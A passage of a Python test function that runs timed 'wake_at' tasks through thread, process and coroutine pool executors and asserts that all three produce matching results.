    pre_input1 = input_generator(workers, 0)
    pre_input2 = input_generator(workers, max(pre_input1))
    pre_input3 = input_generator(workers, max(pre_input2))

    def result_checker(list, lock, fut):
        with lock:
            try:
                list.append(fut.result())
            except Exception as e:
                list.append(e)

    texec = ThreadPoolExecutor(**param)
    pexec = ProcessPoolExecutor(**param)
    cexec = CoroutinePoolExecutor(**param, loop=loop)

    tstart = round(time.time()+1)
    input1 = [tstart + i for i in pre_input1]
    input2 = [tstart + i for i in pre_input2]
    input3 = [tstart + i for i in pre_input3]

    for x in input1:
        future = texec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, tresult, lock))
    result_iter = texec.map(wake_at, input2)
    for x in input3:
        future = texec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, tresult, lock))
    for x in result_iter:
        with lock:
            tresult.append(x)

    texec.shutdown(True)

    pstart = round(time.time() + _start_warm_up)
    input1 = [pstart + i for i in pre_input1]
    input2 = [pstart + i for i in pre_input2]
    input3 = [pstart + i for i in pre_input3]

    for x in input1:
        future = pexec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, presult, lock))
    result_iter = pexec.map(wake_at, input2)
    for x in input3:
        future = pexec.submit(wake_at, x)
        future.add_done_callback(
            functools.partial(result_checker, presult, lock))
    for x in result_iter:
        with lock:
            presult.append(x)

    pexec.shutdown(True)

    cstart = round(time.time() + _start_warm_up)
    input1 = [cstart + i for i in pre_input1]
    input2 = [cstart + i for i in pre_input2]
    input3 = [cstart + i for i in pre_input3]

    async def async_main():
        for x in input1:
            future = cexec.submit(async_wake_at, x)
            future.add_done_callback(
                functools.partial(result_checker, cresult, lock))
        result_iter = cexec.map(async_wake_at, input2)
        for x in input3:
            future = cexec.submit(async_wake_at, x)
            future.add_done_callback(
                functools.partial(result_checker, cresult, lock))
        async for x in result_iter:
            with lock:
                cresult.append(x)
        await cexec.shutdown(False)

    loop.run_until_complete(async_main())

    try:
        loop.run_until_complete(cexec.shutdown(True))
        texec.shutdown(True)
        pexec.shutdown(True)
    finally:
        loop.close()

    tresult = [round((x - tstart) / _precision) for x in tresult]
    presult = [round((x - pstart) / _precision) for x in presult]
    cresult = [round((x - cstart) / _precision) for x in cresult]

    result = True
    for (t, p, c) in zip(tresult, presult, cresult):
        result = result and (t == p)
        if not result:
            print(tresult)
            print(presult)
            print(cresult)
            print(t,p,c)
            assert False
        result = result and (p == c)
        if not result:
            print(tresult)
            print(presult)
            print(cresult)
            print(t, p, c)
            assert False
        result = result and (c == t)
        if not result:
            print(tresult)
            print(presult)
            print(cresult)
            print(t, p, c)
            assert False
    return result